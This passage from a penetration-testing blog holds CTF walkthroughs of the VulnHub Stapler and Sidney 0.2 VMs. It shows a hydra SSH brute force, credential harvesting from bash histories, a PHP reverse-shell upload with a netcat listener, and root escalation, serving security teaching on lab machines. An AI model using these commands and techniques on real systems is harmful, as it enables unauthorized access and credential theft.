<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ftp> get passwd</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">local: passwd remote: passwd</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">200 PORT command successful. Consider using PASV.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">150 Opening BINARY mode data connection for passwd (2908 bytes).</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">226 Transfer complete.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">2908 bytes received in 0.00 secs (6.6826 MB/s)</td></tr>
</tbody></table>
Command: cat passwd | grep bash | cut -d':' -f1<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 10px;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">RNunemaker</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ETollefson</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">DSwanger</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">AParnell</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">SHayslett</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">MBassin</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">JBare</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">LSolum</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">MFrei</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">SStroud</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">JKanode</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">CJoo</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Drew</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">jess</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">SHAY</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">mel</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">zoe</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">NATHAN</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">elly</td></tr>
</tbody></table>
<br />
Okay time to let hydra do what it does best.
Command: hydra -L Actual_Users -P /usr/share/john/password.lst ssh://192.168.153.142 -t 15 -u
<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~/Documents/Stapler# hydra -L Actual_Users -P /usr/share/wordlists/rockyou.txt ssh://192.168.153.142 -t 15 -u</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-27 13:19:14</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[DATA] max 15 tasks per 1 server, overall 64 tasks, 272543581 login tries (l:19/p:14344399), ~283899 tries per task</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[DATA] attacking service ssh on port 22</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[STATUS] 162.00 tries/min, 162 tries in 00:01h, 272543419 todo in 28039:27h, 15 active</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[22][ssh] host: 192.168.153.142 login: Drew password: qwerty</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[STATUS] 203.67 tries/min, 611 tries in 00:03h, 272542970 todo in 22303:02h, 15 active</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[22][ssh] host: 192.168.153.142 login: JBare password: cookie</td></tr>
</tbody></table>
Using the credentials JBare:cookie<br />
Trying to cut some corners, since it seems that all the home folders are public readable....<br />
Command: cat */.bash_history
<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">JBare@red:/home$ cat */.bash_history</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">free</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">top</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ps aux</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">id</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">whoami</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ls -lah</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">19</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">pwd</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">20</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ps aux</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">21</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">sshpass -p thisimypassword ssh JKanode@localhost</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">22</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">apt-get install sshpass</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">23</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">sshpass -p JZQuyIN5 peter@localhost</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">24</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ps -ef</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">25</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">top</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">26</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">kill -9 3747</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">27</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">28</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">29</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">30</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">31</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">32</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">whoami</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">33</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">34</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">35</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">36</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">37</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">38</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">cat: peter/.bash_history: Permission denied</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">39</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">40</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">41</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">42</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">43</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">44</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">45</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">id</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">46</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">top</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">47</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
</tbody></table>
Nice... 2 more sets of credentials<br />
<br />JKanode:thisismypassword<br />
peter:JZQuyIN5<br />
<br />
I am going to try peters credentials first because he has a stronger password...i would like to believe he is a sudoer at a minimum.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVBRyFGewv3_RBm8HcjyMO5GmFtzo9xlERq6GWRb1UhyphenhyphenBfL6coy3Yt3z9zFqV9-RKxamn4NlUngFn1aQJLRprzlXgolt5aL6sNI8oyudyzX16xx21lsXjh9iAZv-F6vSHqAsV65eKFE60/s1600/New+Bitmap+Image+%25282%2529.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVBRyFGewv3_RBm8HcjyMO5GmFtzo9xlERq6GWRb1UhyphenhyphenBfL6coy3Yt3z9zFqV9-RKxamn4NlUngFn1aQJLRprzlXgolt5aL6sNI8oyudyzX16xx21lsXjh9iAZv-F6vSHqAsV65eKFE60/s640/New+Bitmap+Image+%25282%2529.bmp" width="592" /></a></div>
<br />
Jackpot...peter has full root access with a sudo su we get root and claim our flag<br />
<br />
I would like to thank G0tMi1k and Vulnhub and all the testers. This was a very fun VM.ByteReaperhttp://www.blogger.com/profile/05483546627343627430noreply@blogger.com0tag:blogger.com,1999:blog-393700287629243984.post-75503605203066171512016-06-06T16:24:00.001-04:002016-06-06T16:24:14.109-04:00Sidney 0.2Hello World.
Today i am going to be offering up a guide to completing the <a href="https://www.vulnhub.com/entry/sidney-02,149/">Sidney 0.2</a> VM hosted on <a href="https://vulnhub.com/" target="_blank">VulnHub</a>. The VM was produced by <a href="https://twitter.com/@knightmare2600" target="_blank">@knightmare2600</a><br />
<br />
<h3>
Description: </h3>
Welcome to my third boot2root / CTF this one is called Sidney. The VM
is set to grab a DHCP lease on boot. As before, gaining root is not the
end of this VM. You will need to snag the flag, and being me, it's
never where they normally live... B-)<br />
If you are having trouble with the NIC, make sure the adapter is set to use the MAC 00:0C:29:50:14:56<br />
Some hints for you:<br />
<ul>
<li>If you are hitting a wall, read https://de.wikipedia.org/wiki/MOS_Technology_6502</li>
<li>The flag is audio as well as visual</li>
</ul>
SHA1SUM: 114ABA151B77A028AA5CFDAE66D3AEC6EAF0751A sidney.ova<br />
Many thanks to Rasta_Mouse and GKNSB for testing this CTF.<br />
Special thanks and shout-outs go to GKNSB and Rasta_Mouse, hopefully
he streams this one live too! Also a shout-out to g0tmi1k for #vulnhub
and offering to host my third CTF.<br />
<br />
Here We Go:<br />
1. Host Discovery<br />
2. Service Enumeration<br />
<br />
<br />
Host Discovery:<br />
<br />
Discovery of the IP: netdiscover -r 192.168.234.0/24
<br />
<script src="https://gist.github.com/ByteReaper/64def2267ff2e32bd4b4dd1daef6f643.js"></script>
<br />
<b>Our target is 192.168.234.167</b><br />
<br />
<b>Service Enumeration:</b><br />
Now that we have our target (192.168.234.167) we can use nmap to discover any running services.<br />
<i><b>NOTE: nmap could have also been used to discover the host also, but i like using netdiscover purely to speed up the process</b></i><br />
<br />
<br />
<script src="https://gist.github.com/ByteReaper/9f607a858547735c5165a825ef26158b.js"></script>
Hmm only 80 open. Looks like we will be looking for LFI/RFI or a file upload to drop a malicious php script containing either command injection or reverse shell.
<br />
Nikto to the rescue:
<br />
Using nikto.... nikto -host 192.168.234.167
<br />
<script src="https://gist.github.com/ByteReaper/a91035146ef4ad40b880872820a9dc35.js"></script>
Relatively standard information. We note Apache 2.4.18 and we move on.
dirb/dirbuster to the rescue.
<br />
Personally i always run a dirb with the defaults. When needed i will run a dirbuster with the /usr/share/wordlist/dirbuster/directory-list-2.3-medium.txt
<br />
After running dirb -host 192.168.234.167
<br />
<script src="https://gist.github.com/ByteReaper/eb0b5a3faf73353111fe74dc8e6f1bff.js"></script>
Yikes... not much going on here. Time to pull up the site and see what we are working with. I am still going to hold off on dirbuster for now (i love trying to look at the html/css and figure out other directories/pages first)
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZBiiHj-mB7lP0t92Ba9gFSPL12YCf5Y64Zzoa3hZuicY7W80h5xLtWajOvOrVifFIZtJ5coioDhOw_HiD5yKjA5RZUF4_-_g7nfYWi9PGuVY7YynRMtPC4trSNyHe0RA2KczHwvHJb90/s1600/Sidney_Homescreen.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZBiiHj-mB7lP0t92Ba9gFSPL12YCf5Y64Zzoa3hZuicY7W80h5xLtWajOvOrVifFIZtJ5coioDhOw_HiD5yKjA5RZUF4_-_g7nfYWi9PGuVY7YynRMtPC4trSNyHe0RA2KczHwvHJb90/s400/Sidney_Homescreen.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
"Give Ben Daglish a call. I'm sure he's know the login B-)" I will add Ben Daglish to my notes as I smell some OSNIT (<a href="https://en.wikipedia.org/wiki/Open-source_intelligence" target="_blank">Open-source Intelligence</a>) coming up.<br />
Viewing the source we are presented with the following:<br />
<br />
<script src="https://gist.github.com/ByteReaper/4689ddc35010aa3767dcf4b0ac93134e.js"></script>
Sweet the location of the image is in a folder named commodore64. Wonder if that folder has directory listing enabled...
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUIMYmjw5AB17LW3camImjOZ5asar811JP1ZaU7Wx-d91UK7UoECdeR8kKDZQLRQXXTSd1PFwXiVOJYi1Udojl1G0pB1pqhc9BQGeJkd3OYUpZs6MN3WYU0cT2l_2kn-X7DZvOjjLoiSo/s1600/Sidney_Commodore64_Directory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUIMYmjw5AB17LW3camImjOZ5asar811JP1ZaU7Wx-d91UK7UoECdeR8kKDZQLRQXXTSd1PFwXiVOJYi1Udojl1G0pB1pqhc9BQGeJkd3OYUpZs6MN3WYU0cT2l_2kn-X7DZvOjjLoiSo/s1600/Sidney_Commodore64_Directory.png" /></a></div>
<br />
Nope...no directory browsing. but we are greeted by a Commodore64 gif and a message... the source tells us...
<br />
<br />
<script src="https://gist.github.com/ByteReaper/4d0e3cb1d97169fb59124f5c703152e7.js"></script>
<br />
We have a second name: "robhubbard" and a clue as to the password:<br />
"password is the C=64 sound chip lowercase...3letters4digits no space..." <br />
<br />
geez....might as well just write the password....or so i thought... So i went off and used wikipedia (based on the search results for "c=64 sound chip")...long story short i found chips with the prefix of sid and mod...<br />
<br />
Which is great and all... but where the hell is a login screen? Before i use dirbuster on the commodore64 folder i decide to try and figure out what im dealing with... attempting index.php displays...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJQhz6Gaa_RDK2kbadQ7gnlPIYQVAvyfdwQWLKxn_GriNnvCUZzVrGx-5wWFzvjqlg55uVc2nH6DGlKxp4FD0crRpUyrV2iGIY6ViJ_ufL5YKqoS_zQqAPBpVl6kqPOlP5OlfzxVBytpc/s1600/Sidney_Commodore64_index_PHP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="199" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJQhz6Gaa_RDK2kbadQ7gnlPIYQVAvyfdwQWLKxn_GriNnvCUZzVrGx-5wWFzvjqlg55uVc2nH6DGlKxp4FD0crRpUyrV2iGIY6ViJ_ufL5YKqoS_zQqAPBpVl6kqPOlP5OlfzxVBytpc/s400/Sidney_Commodore64_index_PHP.png" width="400" /></a></div>
<br />
<br />
A login screen...wtf were we looking at before...using just index without a suffix returns us to the commodore64 gif...hmm...<br />
Anyhow, PHPFM...the hell is that... after a quick search we can see that PHPFM is a php based filemanager (uploading a php revshell is looking pretty promising).<br />
<br />
Using sqlmap -u "http://192.168.234.167/commodore64/index.php" --forms: yielded no results. damn...<br />
Ok so what we know already from discovery is that Ben Daglish knows the login. and an assumed user "robhubbard" who seems very willing to give up a password.<br />
Time to make a brute forcer using python:<br />
<br />
<script src="https://gist.github.com/ByteReaper/40fc715f20b3c090316f8d693084019c.js"></script>
<i><b>NOTE: You can also use a proxy like BurpSuite (specifically intruder) to attack the form. But i am a coder at heart...and it always seems much more gratifying to create a tool to accomplish a task.</b></i>
<br />
<br />
Running python Bruter.py:<br />
<br />
<script src="https://gist.github.com/ByteReaper/00e74e0dd8b252f8f4d679fa2e2e2f53.js"></script><br />
<b><i>NOTE: Using the bruteforcer too much had caused the Sidney VM (atleast on my machine) to have some funky errors. (Session was not stored properly upon logging on and i had to reset the VM to get it to function correctly again)</i></b>
<br />
<br />
Judging by the output the length of the page increased from 1840/1841 to 18438 think we got a hit on:<br />
<br />
username: robhubbard<br />
password: mos6518<br />
<br />
Trying robhubbard/mos6518 we are authenticated into the PHPFM site.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNXmWD5sxJuBrDlK05pc9L3M6rWCsE9Iy_uu1sSIBkNgkIjiVFpmt0SbF3gyCig3DRg0a34wJgbG27EQ8r2OfbjqbBbxPg0IzkyJ4exCkxjTOR4w04xXLcPxOi7ln2tJVWozMd6Q6JLa8/s1600/Sidney_PHPFM_HomeScreen.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNXmWD5sxJuBrDlK05pc9L3M6rWCsE9Iy_uu1sSIBkNgkIjiVFpmt0SbF3gyCig3DRg0a34wJgbG27EQ8r2OfbjqbBbxPg0IzkyJ4exCkxjTOR4w04xXLcPxOi7ln2tJVWozMd6Q6JLa8/s640/Sidney_PHPFM_HomeScreen.png" width="640" /></a></div>
ooooo...."Upload Files" looks pretty sweet.<br />
Time to use a PHP Reverse shell that i found from <a href="https://gist.github.com/silv3rm00n/5371322" target="_blank">pentestmonkey.net</a><br />
<br />
The reverse shell uploaded without an issue... i figured the site would have fought me alittle more but, hey, thats probably why ive never heard of PHPFM lol..<br />
Anyhow, firing up a netcat listener on port 666( nc -lvp 666) and visiting the revshell.php that i uploaded i get a reverse shell. w00t!
<br />
<br />
<script src="https://gist.github.com/ByteReaper/e6d5aa4cf300ebd31981f457913b95c1.js"></script><br />
<b><i>NOTE: I have modified the payload to be executed slightly to make it display the id/whoami/cat etc/passwd upon connection</i></b>
<br />
<br />
The output from the cat /etc/passwd shows us that the 2 users of the system are root and rhubbard .... Wait.... as in robhubbard? Wonder if the doofus is using the same password. Before we can attempt a su (attempting a su robhubbard at this stage gives us a "su: must be run from a terminal" error), we must get a different shell easy enough. We will use a jailbreak trick found on g0tmi1k's <a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" target="_blank">blog</a> python -c "import pty;pty.spawn('/bin/bash');"<br />
<br />
Using python -c "import pty;pty.spawn('/bin/bash');" results in a "/bin/sh: 2: python: not found" error...python is missing.. hrmmm...
I decide to go looking to see whats up with python.
<br />
<script src="https://gist.github.com/ByteReaper/c1290bf0977122f76819d5595077afca.js"></script>
hmmm. can i replace python with python3.5? Sure can.<br />
<script src="https://gist.github.com/ByteReaper/4e72aa24d362e345550702252b3b3df0.js"></script><br />
<br />
Ok... now lets see if numbnuts uses the same password. using "su rhubbard" and "mos6518" as the password we successfully switch users to rhubbard...<br />
